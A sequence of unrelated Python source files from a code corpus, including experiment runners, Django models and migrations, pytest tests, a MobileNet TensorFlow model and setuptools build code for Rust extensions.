worker["YearsOfExperience"] = math.floor(worker["YearsOfExperience"] / 5) * 5
return worker
documents = []
if self.configuration != 'opaque_dataset':
for w in self.collection.find().limit(self.limit):
w = convert_to_ranges(w)
documents.append(w)
else:
with open('./datasets/simulated/opaque_dataset/' + str(self.limit) + '/' + str(self.k) + '.csv', mode='r') as f:
reader = csv.DictReader(f)
rows = list(reader)
for row in rows:
w = dict(row)
yob = True
yoe = True
w["LanguageTest"] = int(w["LanguageTest"])
w["ApprovalRate"] = int(w["ApprovalRate"])
if w["YearOfBirth"][:1] in ['*', '[']:
yob = False
if w["YearsOfExperience"][:1] in ['*', '[']:
yoe = False
w = convert_to_ranges(w, year_of_birth=yob, years_of_experience=yoe)
documents.append(w)
return documents
def get_documents(self):
if self.db_name.startswith('WorkerSet'):
return self.__retrieve_simulated_dataset()
documents = []
for w in self.collection.find().limit(self.limit):
documents.append(w)
return documents
@staticmethod
def __get_simulated_dataset_attributes_list(worker):
attributes = {}
for key in worker:
attributes[key] = []
# Remove non-attributes from attributes dictionary. This includes qualifications such as LanguageTest and
# ApprovalRate
attributes.pop("_id")
attributes.pop("id")
attributes.pop("LanguageTest")
attributes.pop("ApprovalRate")
return attributes
def get_attributes(self, documents):
worker = documents[0]
if self.db_name.startswith('WorkerSet'):
attributes = self.__get_simulated_dataset_attributes_list(worker)
else:
raise RuntimeError('Function that handles attributes is not specified for the dataset provided.')
# Add different attribute values under attribute name
for i in documents:
for j in attributes:
# add new values of the attribute to the list values
if i[j] not in attributes[j]:
attributes[j].append(i[j])
if self.configuration == 'opaque_dataset':
for j in attributes.copy():
if len(attributes[j]) <= 1:
attributes.pop(j)
return attributes
def build_tables(self, name, values, time_values, functions=None, percentages=None):
"""
:param name:
:param percentages:
:param functions:
:param time_values:
:param values:
:return:
"""
def build_table(title, values):
b_table = BeautifulTable(max_width=200)
t_headers = [title]
if self.configuration == 'opaque_process':
for key in percentages:
t_headers.append(str(key) + '%')
else:
for key in functions:
t_headers.append('f' + str(key))
b_table.column_headers = t_headers
for i in range(len(values)):
b_table.append_row(values[i][:])
return b_table
table = build_table(name, values)
table.numeric_precision = 4
print(name)
print(table)
timetable = build_table('TIMINGS', time_values)
print('-----------------------')
print('TIMINGS')
print(timetable)
return str(table), str(timetable)
@staticmethod
def run_algorithm(algorithm, method, num_of_runs=1):
"""
:param algorithm:
:param method:
:param num_of_runs:
:return:
"""
value_per_run = []
time_per_run = []
for i in range(num_of_runs):
start = time.time()
value_per_run.append(algorithm.metric(method()))
end = time.time()
time_per_run.append(end - start)
return np.mean(value_per_run), np.mean(time_per_run)
def run_experiments(self, quantify_disparity_metric, workers, attributes, functions=None, percentages=None,
bins='preset', criterion='avg', normalize=True, scaling='standardization'):
"""
:param normalize:
:param scaling:
:param criterion:
:param quantify_disparity_metric:
:param workers:
:param attributes:
:param functions:
:param percentages:
:param bins:
:return:
"""
if self.configuration == 'opaque_process':
variants = percentages
else:
variants = functions
all_values = [
["unbalanced"],
["r-unbalanced"],
["balanced"],
["r-balanced"],
["exhaustive"]
]
all_time_values = [
["unbalanced"],
["r-unbalanced"],
["balanced"],
["r-balanced"],
["exhaustive"]
]
name = 'undefined'
for key in variants:
if quantify_disparity_metric.__name__ == 'KL':
name = self.db_name + '-KL-' + self.configuration + '-scaling-' + scaling + '-workers-' + str(self.limit)
quantify_disparity = quantify_disparity_metric(workers, attributes,
configuration=self.configuration,
f=variants[key],
selected=variants[key],
bins=bins,
scaling=scaling)
else:
name = self.db_name + '-EMD-' + self.configuration + '-bins-' + bins + '-normalize-' + str(normalize) + '-criterion-' \
+ criterion + str(self.limit)
quantify_disparity = quantify_disparity_metric(workers, attributes,
configuration=self.configuration,
f=variants[key],
selected=variants[key],
bins=bins, normalize=normalize, criterion=criterion)
methods = [
quantify_disparity.unbalanced,
quantify_disparity.random_unbalanced,
quantify_disparity.balanced,
quantify_disparity.random_balanced,
quantify_disparity.exhaustive
]
for i in range(len(methods)):
num_of_times = 5 if i in [1, 3] else 1
value, exec_time = self.run_algorithm(quantify_disparity, methods[i], num_of_times)
all_values[i].append(value)
all_time_values[i].append(exec_time)
return name, all_values, all_time_values
| StarcoderdataPython |
3534124 | <filename>guanabara/Exercicios/utilidades/cor/__init__.py
c = {'z': '\033[m'}
l = ['w', 'r', 'g', 'y', 'b', 'm', 'c', 'k']
i = j = 0
for lin in range(30, 38):
c[l[i]] = f'\033[{lin}m'
i += 1
i = j = 0
for lin in range(30, 38):
for col in range(40, 48):
c[l[i] + l[j]] = f'\033[{lin};{col}m'
j += 1
i += 1
j = 0
def clr(text='', value='z'):
return c[value] + str(text) + c['z']
| StarcoderdataPython |
4829225 | """Test template loading functions."""
import pytest
import flatware.template_loading as loading
def test_load_file(tmpdir):
"""Test we can load a plate."""
plate = tmpdir.join("recipe")
plate.write("Plate text")
result = loading.load_template("recipe", template_dir=str(tmpdir))
assert result == "Plate text"
def test_list_plates(tmpdir):
"""Test that we can list all plates."""
plate = tmpdir.join("component")
plate.write("Plate text")
result = loading.get_avaliable_template_names(template_dir=str(tmpdir))
assert result == ["component"]
def test_load_plate_does_not_exist(tmpdir):
"""Test proper errors are raised."""
with pytest.raises(FileNotFoundError) as e_info:
loading.load_template("ghost", str(tmpdir))
assert "No template with name 'ghost' found!" in e_info.value.args[0]
| StarcoderdataPython |
6450588 | from __future__ import absolute_import
from __future__ import print_function
import os
import sys
from conversion_imagenet import TestModels
def get_test_table():
return { 'darknet' :
{
'yolov2' : [
#TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
#TestModels.coreml_emit,
TestModels.keras_emit,
#TestModels.mxnet_emit,
#TestModels.pytorch_emit,
#TestModels.tensorflow_emit
],
'yolov3' : [
#TestModels.onnx_emit,
#TestModels.caffe_emit,
#TestModels.cntk_emit,
#TestModels.coreml_emit,
TestModels.keras_emit,
#TestModels.mxnet_emit,
#TestModels.pytorch_emit,
#TestModels.tensorflow_emit
]
}
}
def test_darknet():
test_table = get_test_table()
tester = TestModels(test_table)
tester._test_function('darknet', tester.darknet_parse)
if __name__ == '__main__':
test_darknet()
| StarcoderdataPython |
1638831 | # -*- coding: utf-8 -*-
from . import TenantWrappedCommand
from django.contrib.staticfiles.management.commands import collectstatic
class Command(TenantWrappedCommand):
COMMAND = collectstatic.Command
| StarcoderdataPython |
6422023 | # Generated by Django 2.2.1 on 2019-06-29 14:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('smarttm_web', '0030_attendance'),
]
operations = [
migrations.AddField(
model_name='meeting',
name='meeting_no',
field=models.CharField(default='x1', max_length=20),
preserve_default=False,
),
migrations.AddField(
model_name='meeting_summary',
name='members_absent_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='meeting_summary',
name='members_present_count',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='summary',
name='attendance_percent',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='summary',
name='last_two_meetings_att',
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name='summary',
name='tt_percent',
field=models.IntegerField(default=0),
),
]
| StarcoderdataPython |
389549 | <reponame>VictorZXY/meowjong<filename>evaluation/hand_calculation/yaku_list/tanyao.py
from typing import List
from evaluation.hand_calculation.tile_constants import YAOCHUUHAI
from evaluation.hand_calculation.yaku import Yaku
class Tanyao(Yaku):
"""
Hand with no terminals and honours.
"""
def __init__(self):
super().__init__()
def set_attributes(self):
self.name = 'Tanyao'
self.english = 'All Simples'
self.japanese = '断幺九'
self.chinese = '断幺九'
self.han_open = 1
self.han_closed = 1
self.is_yakuman = False
def is_condition_met(self, hand: List[List[int]], *args):
for item in hand:
for index in YAOCHUUHAI:
if item[index] != 0:
return False
return True
| StarcoderdataPython |
9614433 | <gh_stars>0
from django.db import models
#from django.contrib.contenttypes.models import ContentType
from django.contrib.auth.models import User
from django.conf import settings
from django.core.urlresolvers import reverse
import pathlib
import re
class Collision(models.Model):
experiment_id = models.CharField(max_length=20)
blob_id = models.IntegerField()
class Meta:
unique_together = ('experiment_id', 'blob_id')
def __unicode__(self):
return 'XID {}'.format(self.xid())
def xid(self):
return '{}-{:05}'.format(self.experiment_id, self.blob_id)
def get_absolute_url(self):
return reverse('collisions:collision', kwargs={
'eid': self.experiment_id,
'bid': self.blob_id,
})
def image_file(self):
return (settings.COLLISION_IMAGES /
'{}_{:05}.png'.format(self.experiment_id, self.blob_id))
def answer_count(self):
return CuratedAnswer.objects.filter(object_pk=self.id).count()
@staticmethod
def find_images():
r = re.compile("(?P<eid>\d{8}_\d{6})_(?P<bid>\d{5})\.png")
for f in settings.COLLISION_IMAGES.glob('*.png'):
rm = r.match(f.name)
if not rm:
continue
eid, bid = rm.groups()
yield eid, int(bid)
class CuratedAnswer(models.Model):
ANSWERS = (
('00', 'No worms'),
('05', '>0, <1 worms'),
('10', '1 worm'),
('15', '>1, <2 worms'),
('20', '2 worms'),
('25', '>2, <3 worms'),
('30', '3 worms'),
('35', '>3 worms'),
)
collision = models.ForeignKey(Collision, related_name='answers')
answer = models.CharField(max_length=60, choices=ANSWERS)
curator = models.ForeignKey(User, editable=False, related_name='collision_answer_user')
starred = models.BooleanField(default=False)
class Meta:
unique_together = ('collision', 'curator')
def __unicode__(self):
return 'XID {}, {} said {}{}'.format(
self.collision.xid(),
self.curator.username, self.answer, ' !!!' if self.starred else '')
| StarcoderdataPython |
1773060 | from django.db import models
class Category(models.Model):
name = models.CharField(max_length=150)
def __str__(self):
return self.name
class Product(models.Model):
name = models.CharField(max_length=150)
nutriscore = models.CharField(max_length=1)
url = models.URLField()
image_url = models.URLField(default=None)
fat_100g = models.FloatField(default=None)
saturated_fat_100g = models.FloatField(default=None)
sugars_100g = models.FloatField(default=None)
salt_100g = models.FloatField(default=None)
category = models.ForeignKey(Category, on_delete=models.PROTECT)
def __str__(self):
return self.name
| StarcoderdataPython |
8190898 | from revarie import Revarie
from revarie import Variogram
from revarie import fvariogram
import numpy as np
import time
import datetime
from .output import write
from pathlib import Path
def bench_variogram(tlimit = 15, path = "."):
"""
Run timing benchmark test for variogram class. Results are formatted and
printed to a file named "variogram_timing###.dat".
Parameters
----------
tlimit : float
Approximate wall time limit for tests to run.
path : str, path-like
Path for results file to be printed to
"""
tot_time = time.time()
n = 50
ns = []
ts = []
while time.time() - tot_time < tlimit:
start = time.time()
ns.append(n)
x = np.random.uniform(0,1,n)
f = np.random.uniform(0,1,n)
Variogram(x,f)
ts.append(time.time() - start)
n = int(n*1.2)
t = 0
fname = Path("variogram_timing" + str(t).zfill(3) + ".dat")
while (Path(path) / fname).is_file():
t += 1
fname = Path("variogram_timing" + str(t).zfill(3) + ".dat")
write(np.asarray(ns),np.asarray(ts),Path(path) / fname,"Variogram", "1-D")
def bench_revarie(tlimit = 15, path = "."):
"""
Run timing benchmark test for revarie class. Results are formatted and
printed to a file named "revarie_timing###.dat".
Parameters
----------
tlimit : float
Approximate wall time limit for tests to run.
path : str, path-like
Path for results file to be printed to
"""
tot_time = time.time()
nug = 0
sill = 1
rang = 0.3
v = fvariogram("func", "sph", [nug, sill, rang])
mu = 1
n = 50
ns = []
ts = []
while time.time() - tot_time < tlimit:
start = time.time()
ns.append(n)
x = np.random.uniform(0,1,n)
Revarie(x, mu, sill, v).genf()
ts.append(time.time() - start)
n = int(n*1.2)
t = 0
fname = Path("revarie_timing" + str(t).zfill(3) + ".dat")
while (Path(path) / fname).is_file():
t += 1
fname = Path("revarie_timing" + str(t).zfill(3) + ".dat")
write(np.asarray(ns),np.asarray(ts),Path(path) / fname,"Revarie", "1-D")
def suite(tlimit = 30, path = "."):
"""
Run timing benchmark test for both the revarie and variogram classes.
Results are formatted and printed to a file named "revarie_timing###.dat".
Each benchmark is run with equal time division for each object.
Parameters
----------
tlimit : float
Approximate wall time limit for tests to run.
path : str, path-like
Path for results files to be printed to
"""
bench_variogram(tlimit/2, path = path)
bench_revarie(tlimit/2, path = path)
| StarcoderdataPython |
6569544 | <reponame>BrianOtieno/tClinix<gh_stars>0
from bcrypt import gensalt, hashpw
from flask import current_app
from flask_login import UserMixin
from sqlalchemy import Column, Float, Integer, String
from sqlalchemy.orm import relationship
from threading import Thread
from tClinix import db , scheduler
from tClinix.base.custom_base import CustomBase
class User(CustomBase, UserMixin):
__tablename__ = 'User'
id = Column(Integer, primary_key=True)
type = Column(String, default='admin')
name = Column(String(120), unique=True)
email = Column(String(120), unique=True)
access_rights = Column(String(120))
password = Column(String(30))
# tasks = relationship('Task', back_populates='user')
def update(self, **kwargs):
hash = hashpw(kwargs.pop('password').encode('utf8'), gensalt())
if current_app.production:
current_app.vault_client.write(
f'secret/data/user/{kwargs["name"]}',
data={'password': <PASSWORD>('utf-8')}
)
else:
kwargs['password'] = <PASSWORD>('utf-8')
super().update(**kwargs)
def __repr__(self):
return self.name
| StarcoderdataPython |
395712 | <filename>angrytux/model/game_objects/enemies/enemy_states/HittedState.py
from angrytux.model.game_objects.enemies.enemy_states.DeadState import DeadState
from angrytux.model.game_objects.enemies.enemy_states.EnemyState import EnemyState
class HittedState(EnemyState):
def __init__(self, enemy):
super().__init__(enemy)
# FPS * seconds
self.live_time = 60 * 0.5
def move(self) -> bool:
"""
By the timer, change state and move or don't move
:return: True if change state, False otherwise
"""
self.live_time -= 1
if self.live_time == 0:
self._enemy.state = DeadState(self._enemy)
return True
return False
def hit(self) -> None:
"""
Method for hit this enemy (what to do when hitted)
Do nothing
"""
pass
@property
def delete(self) -> bool:
return False
@property
def collidable(self) -> bool:
"""
Determinate if this object could collied with missile
:return: True if collide, False otherwise
"""
return False
| StarcoderdataPython |
212899 | <reponame>mbatchkarov/dc_evaluation
import pytest
from numpy.testing import assert_array_equal
from discoutils.thesaurus_loader import Vectors
from discoutils.tokens import DocumentFeature, Token
DIM = 10
unigram_feature = DocumentFeature('1-GRAM', (Token('a', 'N'),))
unk_unigram_feature = DocumentFeature('1-GRAM', ((Token('unk', 'UNK')),))
bigram_feature = DocumentFeature('2-GRAM', (Token('a', 'N'), Token('b', 'V')))
unk_bigram_feature = DocumentFeature('2-GRAM', (Token('a', 'N'), Token('UNK', 'UNK')))
an_feature = DocumentFeature('AN', (Token('c', 'J'), Token('a', 'n')))
known_features = set([unigram_feature, bigram_feature, an_feature])
all_features = set([unigram_feature, bigram_feature, an_feature, unk_unigram_feature, unk_bigram_feature])
@pytest.fixture(scope='module')
def small_vectors():
return Vectors.from_tsv('tests/resources/thesauri/small.txt.events.strings')
@pytest.fixture
def vectors_a():
return Vectors.from_tsv('tests/resources/exp0-0a.strings')
@pytest.fixture
def ones_vectors():
return Vectors.from_tsv('tests/resources/ones.vectors.txt')
@pytest.fixture
def ones_vectors_no_pos():
return Vectors.from_tsv('tests/resources/ones.vectors.nopos.txt',
enforce_word_entry_pos_format=False)
def test_unigr_source_get_vector(small_vectors):
# vectors come out right
# a/N amod:c 2 T:t1 1 T:t2 2 T:t3 3
assert_array_equal(
small_vectors.get_vector('a/N').todense(),
[[0., 2., 0., 1., 2., 3., 0., 0.]]
)
# vocab is in sorted order
assert ['also/RB', 'amod:c', 'now/RB', 't:t1', 't:t2', 't:t3', 't:t4', 't:t5', ] == small_vectors.columns
assert small_vectors.get_vector('jfhjgjdfyjhgb/N') is None
assert small_vectors.get_vector('jfhjgjdfyjhgb/J') is None
def test_unigr_source_contains(small_vectors):
"""
Test if the unigram model only accepts unigram features
"""
# for thing in (known_features | unk_unigram_feature | unk_bigram_feature):
assert str(unigram_feature) in small_vectors
for thing in (unk_unigram_feature, bigram_feature, unk_unigram_feature):
assert str(thing) not in small_vectors
| StarcoderdataPython |
1635540 | from typing import Optional
import keyring
import os
from ..util import KEYRING_SERVICE, is_plain_secret_storage, fatal, run, session_file
def signin(account: str) -> Optional[str]:
(status, stdout, stderr) = run(["signin", "--raw", f"--account={account}"], silent=True)
if not status:
fatal(stderr)
if is_plain_secret_storage():
try:
fd = os.open(session_file(account), os.O_CREAT | os.O_WRONLY, 0o600)
with open(fd, "w") as f:
f.write(stdout)
return stdout
except Exception as e:
fatal(f"cannot write session file: {type(e).__name__}")
else:
try:
keyring.set_password(KEYRING_SERVICE, account, stdout)
return stdout
except keyring.errors.KeyringError as e:
fatal(f"cannot write session file: {type(e).__name__}")
| StarcoderdataPython |
8194435 | <reponame>AAm-kun/netmiko
import time
from netmiko.base_connection import BaseConnection
class WatchguardFirewareSSH(BaseConnection):
"""
Implements methods for communicating with Watchguard Firebox firewalls.
"""
def session_preparation(self):
"""
Prepare the session after the connection has been established.
Set the base prompt for interaction ('#').
"""
self._test_channel_read()
self.set_base_prompt()
# Clear the read buffer
time.sleep(0.3 * self.global_delay_factor)
self.clear_buffer()
def check_config_mode(self, check_string=")#", pattern="#"):
"""
Checks if the device is in configuration mode or not.
"""
return super().check_config_mode(check_string=check_string, pattern=pattern)
def config_mode(
self, config_command: str = "configure", pattern: str = r"\#", re_flags: int = 0
) -> str:
return super().config_mode(
config_command=config_command, pattern=pattern, re_flags=re_flags
)
def exit_config_mode(self, exit_config="exit", pattern="#"):
return super().exit_config_mode(exit_config=exit_config, pattern=pattern)
def save_config(self, *args, **kwargs):
"""No save config on Watchguard."""
pass
| StarcoderdataPython |
1756425 | def isPerfect(n):
s = 1
k = 2
while(k * k <= n):
if n % k == 0:
s += k
m = n // k
if m != k:
s += m
k += 1
return s == n
a = int(input("a: "))
b = int(input("b: "))
for i in range(a,b):
if isPerfect(i):
print(i)
| StarcoderdataPython |
9716103 | <reponame>Sourolio10/face-antispoofing-using-mobileNet<filename>model.py
import tensorflow as tf
from layers import depthwise_separable_conv2d, conv2d, avg_pool_2d, dense, flatten, dropout
import os
from utils import load_obj, save_obj
import numpy as np
class MobileNet:
"""
MobileNet Class
"""
def __init__(self,
args):
# init parameters and input
self.X = None
self.y = None
self.logits = None
self.is_training = None
self.loss = None
self.regularization_loss = None
self.cross_entropy_loss = None
self.train_op = None
self.accuracy = None
self.y_out_argmax = None
self.summaries_merged = None
self.args = args
self.mean_img = None
self.nodes = dict()
self.pretrained_path = os.path.realpath(self.args.pretrained_path)
self.__build()
def __init_input(self):
with tf.variable_scope('input'):
# Input images
self.X = tf.placeholder(tf.float32,
[self.args.batch_size, self.args.img_height, self.args.img_width,
self.args.num_channels])
# Classification supervision, it's an argmax. Feel free to change it to one-hot,
# but don't forget to change the loss from sparse as well
self.y = tf.placeholder(tf.int32, [self.args.batch_size])
# is_training is for batch normalization and dropout, if they exist
self.is_training = tf.placeholder(tf.bool)
def __init_mean(self):
# Preparing the mean image.
img_mean = np.ones((1, 224, 224, 3))
img_mean[:, :, :, 0] *= 103.939
img_mean[:, :, :, 1] *= 116.779
img_mean[:, :, :, 2] *= 123.68
self.mean_img = tf.constant(img_mean, dtype=tf.float32)
def __build(self):
self.__init_global_epoch()
self.__init_global_step()
self.__init_mean()
self.__init_input()
self.__init_network()
self.__init_output()
def __init_network(self):
with tf.variable_scope('mobilenet_encoder'):
# Preprocessing as done in the paper
with tf.name_scope('pre_processing'):
preprocessed_input = (self.X - self.mean_img) / 255.0
# Model is here!
conv1_1 = conv2d('conv_1', preprocessed_input, num_filters=int(round(32 * self.args.width_multiplier)),
kernel_size=(3, 3),
padding='SAME', stride=(2, 2), activation=tf.nn.relu6,
batchnorm_enabled=self.args.batchnorm_enabled,
is_training=self.is_training, l2_strength=self.args.l2_strength, bias=self.args.bias)
self.__add_to_nodes([conv1_1])
############################################################################################
conv2_1_dw, conv2_1_pw = depthwise_separable_conv2d('conv_ds_2', conv1_1,
width_multiplier=self.args.width_multiplier,
num_filters=64, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv2_1_dw, conv2_1_pw])
conv2_2_dw, conv2_2_pw = depthwise_separable_conv2d('conv_ds_3', conv2_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=128, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv2_2_dw, conv2_2_pw])
############################################################################################
conv3_1_dw, conv3_1_pw = depthwise_separable_conv2d('conv_ds_4', conv2_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=128, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv3_1_dw, conv3_1_pw])
conv3_2_dw, conv3_2_pw = depthwise_separable_conv2d('conv_ds_5', conv3_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=256, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv3_2_dw, conv3_2_pw])
############################################################################################
conv4_1_dw, conv4_1_pw = depthwise_separable_conv2d('conv_ds_6', conv3_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=256, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv4_1_dw, conv4_1_pw])
conv4_2_dw, conv4_2_pw = depthwise_separable_conv2d('conv_ds_7', conv4_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv4_2_dw, conv4_2_pw])
############################################################################################
conv5_1_dw, conv5_1_pw = depthwise_separable_conv2d('conv_ds_8', conv4_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_1_dw, conv5_1_pw])
conv5_2_dw, conv5_2_pw = depthwise_separable_conv2d('conv_ds_9', conv5_1_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_2_dw, conv5_2_pw])
conv5_3_dw, conv5_3_pw = depthwise_separable_conv2d('conv_ds_10', conv5_2_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_3_dw, conv5_3_pw])
conv5_4_dw, conv5_4_pw = depthwise_separable_conv2d('conv_ds_11', conv5_3_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_4_dw, conv5_4_pw])
conv5_5_dw, conv5_5_pw = depthwise_separable_conv2d('conv_ds_12', conv5_4_pw,
width_multiplier=self.args.width_multiplier,
num_filters=512, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_5_dw, conv5_5_pw])
conv5_6_dw, conv5_6_pw = depthwise_separable_conv2d('conv_ds_13', conv5_5_pw,
width_multiplier=self.args.width_multiplier,
num_filters=1024, kernel_size=(3, 3), padding='SAME',
stride=(2, 2),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv5_6_dw, conv5_6_pw])
############################################################################################
conv6_1_dw, conv6_1_pw = depthwise_separable_conv2d('conv_ds_14', conv5_6_pw,
width_multiplier=self.args.width_multiplier,
num_filters=1024, kernel_size=(3, 3), padding='SAME',
stride=(1, 1),
batchnorm_enabled=self.args.batchnorm_enabled,
activation=tf.nn.relu6,
is_training=self.is_training,
l2_strength=self.args.l2_strength,
biases=(self.args.bias, self.args.bias))
self.__add_to_nodes([conv6_1_dw, conv6_1_pw])
############################################################################################
avg_pool = avg_pool_2d(conv6_1_pw, size=(7, 7), stride=(1, 1))
dropped = dropout(avg_pool, self.args.dropout_keep_prob, self.is_training)
self.logits = flatten(conv2d('fc', dropped, kernel_size=(1, 1), num_filters=self.args.num_classes,
l2_strength=self.args.l2_strength,
bias=self.args.bias))
self.__add_to_nodes([avg_pool, dropped, self.logits])
def __init_output(self):
with tf.variable_scope('output'):
self.regularization_loss = tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
self.cross_entropy_loss = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits, labels=self.y, name='loss'))
self.loss = self.regularization_loss + self.cross_entropy_loss
# Important for Batch Normalization
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
self.train_op = tf.train.AdamOptimizer(learning_rate=self.args.learning_rate).minimize(self.loss)
self.y_out_argmax = tf.argmax(tf.nn.softmax(self.logits), axis=-1, output_type=tf.int32)
self.accuracy = tf.reduce_mean(tf.cast(tf.equal(self.y, self.y_out_argmax), tf.float32))
# Summaries needed for TensorBoard
with tf.name_scope('train-summary-per-iteration'):
tf.summary.scalar('loss', self.loss)
tf.summary.scalar('acc', self.accuracy)
self.summaries_merged = tf.summary.merge_all()
def __restore(self, file_name, sess):
try:
print("Loading ImageNet pretrained weights...")
variables = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope='mobilenet_encoder')
dict = load_obj(file_name)
run_list = []
for variable in variables:
for key, value in dict.items():
if key in variable.name:
run_list.append(tf.assign(variable, value))
sess.run(run_list)
print("ImageNet Pretrained Weights Loaded Initially\n\n")
except:
print("No pretrained ImageNet weights exist. Skipping...\n\n")
def load_pretrained_weights(self, sess):
self.__restore(self.pretrained_path, sess)
def __add_to_nodes(self, nodes):
for node in nodes:
self.nodes[node.name] = node
def __init_global_epoch(self):
"""
Create a global epoch tensor to totally save the process of the training
:return:
"""
with tf.variable_scope('global_epoch'):
self.global_epoch_tensor = tf.Variable(-1, trainable=False, name='global_epoch')
self.global_epoch_input = tf.placeholder('int32', None, name='global_epoch_input')
self.global_epoch_assign_op = self.global_epoch_tensor.assign(self.global_epoch_input)
def __init_global_step(self):
"""
Create a global step variable to be a reference to the number of iterations
:return:
"""
with tf.variable_scope('global_step'):
self.global_step_tensor = tf.Variable(0, trainable=False, name='global_step')
self.global_step_input = tf.placeholder('int32', None, name='global_step_input')
self.global_step_assign_op = self.global_step_tensor.assign(self.global_step_input)
| StarcoderdataPython |
11219911 | <gh_stars>0
import os
from setuptools import Command
from setuptools.command.develop import develop
from setuptools.command.install_lib import install_lib
import subprocess
import sys
from typing import List, Optional
from rustypy.module import RustyModule
class RustCommand(Command):
description = "build rust extension"
user_options = [
('modules=', None, 'list of rust modules'),
('release=', None, 'boolean for --release flag')
]
def initialize_options(self) -> None:
self.modules: Optional[List[RustyModule]] = None
self.release = True
def finalize_options(self) -> None:
pass
def run(self) -> None:
if self.modules is None:
return
for module in self.modules:
self.compile(module)
for module in self.modules:
self.deploy(module)
def compile(self, module: RustyModule) -> None:
args = ['Cargo', 'build']
if self.release is True:
args.append('--release')
args.extend([
'--manifest-path',
'{}'.format(os.path.join(module.path, 'Cargo.toml')),
'--color',
'always',
])
print((
"[rustypy] Compiling rust extension module '{}'"
.format(module.name))
)
process = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
encoding='utf-8',
)
for line in iter(process.stderr.readline, ''):
sys.stderr.write(line)
sys.stderr.flush()
process.wait()
if process.returncode != 0:
raise Exception(
"Failed to compile '{}' module".format(module.name)
)
def deploy(self, module: RustyModule) -> None:
mode = 'release' if self.release else 'debug'
lib_path = os.path.join(
module.path,
'target',
mode,
module._lib_name
)
build_ext = self.get_finalized_command('build_ext')
ext_fullpath = build_ext.get_ext_fullpath(module.name)
self.mkpath(os.path.dirname(ext_fullpath))
self.copy_file(lib_path, ext_fullpath)
build_rust = RustCommand
class develop_with_rust(develop):
def run(self) -> None:
super().run()
self.run_command('build_rust')
class install_lib_with_rust(install_lib):
def build(self) -> None:
install_lib.build(self)
self.run_command('build_rust')
| StarcoderdataPython |
3259314 | <gh_stars>1-10
# -*- coding: utf-8 -*-
from setuptools import setup
packages = ['codesync', 'notificator']
package_data = {'': ['*']}
entry_points = {'console_scripts': ['codesync = codesync.cli:run']}
setup_kwargs = {
'name': 'codesync',
'version': '1.0',
'description': 'Sync your code changes as you make them',
'long_description': 'Sync your code changes as you make them',
